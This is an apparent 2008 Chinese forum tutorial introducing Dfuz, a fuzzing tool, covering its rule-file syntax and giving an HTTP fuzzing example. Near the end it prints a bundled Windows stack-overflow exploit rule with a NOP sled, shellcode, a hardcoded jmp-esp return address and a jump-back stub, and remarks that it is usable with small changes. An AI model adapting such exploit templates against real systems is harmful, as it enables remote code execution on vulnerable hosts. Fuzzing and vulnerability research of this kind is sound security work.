软件漏洞挖掘Fuzz工具之四-Dfuz

标题：软件漏洞挖掘Fuzz工具之四-Dfuz
作者：condor
时间：2008-08-05 13:29
链接：http://bbs.pediy.com/showthread.php?t=70045

文章作者】: condor
【作者邮箱】: cracker@vip.qq.com
【作者主页】: http://hi.baidu.com/linshifei
【作者声明】: 只是感兴趣，没有其他目的。失误之处敬请诸位大侠赐教!

这次介绍比较的简单的一个入门级的工具-DFUZ 。
http://www.genexx.org/dfuz/ 下载地址。

而且有不错的成绩
http://www.genexx.org/dfuz/analysis.html

特点就是数据定义方便，简单易用的。

通过配置文件（*.rule）描述Fuzz数据
配置文件的几个语法有： data（变量）， list，函数，options（选项）

例子：

变量:

var myVar = "Something"
var myVar2 = "String",0x41,|0xdeadbeef|,|0xdeadbeefx5|,|"\x41\x41\x41\x41"x2|,[Bx50],[\x45x6],["Hello"x4],1024,{b040d0b4-b040d0b8- x 1}
var myVar3 = $myVar2
--------------
list：
list some_list:
begin
  some_data
  some_data
  some_data
end

--------------
函数
- %dec2str(num) : Will convert (num) to string and put it. //函数说明
Example: %dec2str(1024) //调用
Result: "1024"
---------------
Options

指定这个配置文件的选项
支持选项有：

- interact: will do select() between the client and server after processing every "peer" command.
- keep_connecting: this will continue the process even if we cannot connect (in a few words: DON'T EXIT).
- big_endian: will make {} formats big endian (little_endian by default)
- little_endian: will make {} formats little endian (default)
- tcp: will make a stream socket
- udp: will make a datagram socket
- client_side: Will connect to a server. (Default)
- server_side: Will be a server waiting for a connection.
- use_stdout: This option will make the socket to be stdout instead of a peer, to use this you need to use "stdout" as the host also.
---------
我们利用以上语法来看一个http协议rules的例子：

例如：
port = 80/tcp

list some_list:
begin
  GET
  HEAD
End

var get_file = "/index.html"
var content_length = %dec2str(0xffffffff)

peer write: $some_list[rand], $get_file, "HTTP/1.0",0x0d,0x0a
peer write: "Server: www.baidu.com"
peer write: 0x0d,0x0a,"Content-Length: ",$content_length,0x0d,0x0a,0x0d,0x0a

peer read
options = client_side

看完这个，你一定很清楚语法了 -_-

使用也很简单，这样就开始一次fuzz了：
./dfuz 172.16.3.111 ./rules/http.rule v

建议多看些rule文件，你就会很熟悉它的使用了，系统自带的在这个目录
root@sec-portal:/usr/local/condor/fuzz/dfuz_0.3.0-beta/rules# ls
dh2.rule       foo-exploit.rule  fuzz_local.rule  msrpc-1.rule  shttp_GET.rule  win32-xpl.rule
dhcp-bug.rule  foo.rule          http.rule        my-ftp.rule   telnet.rule

再看一个例子

root@sec-portal:/usr/local/condor/fuzz/dfuz_0.3.0-beta/rules# cat win32-xpl.rule
# Some rule to exploit a win32 stack overrun example.
# Diego Bauche
<inc "./vars/shellcodes.vars">

var shellcode = $win32_alnum_scode

var nops_len = %length(1032-$shellcode)
var nops_first = [\x90x$nops_len]

var nops_last = [\x90x36]

# jmp esp - windows 2000 sp0
var eip = |77e822ea|

# Nasty, sub sp, 400 - jmp esp
var jump_back = 0x66,0x81,0xec,0x02,0x04,0x8b,0xec,0xff,0xe4

var payload = $nops_first,$shellcode,%random:dword(),$eip,$nops_last,$jump_back

port=4000/tcp

peer write: $payload

options=

不是很难吧，改改就可以用了，很容易举一反三
真是是菜鸟入门，探亲访友，装腔作势的必备工具-_-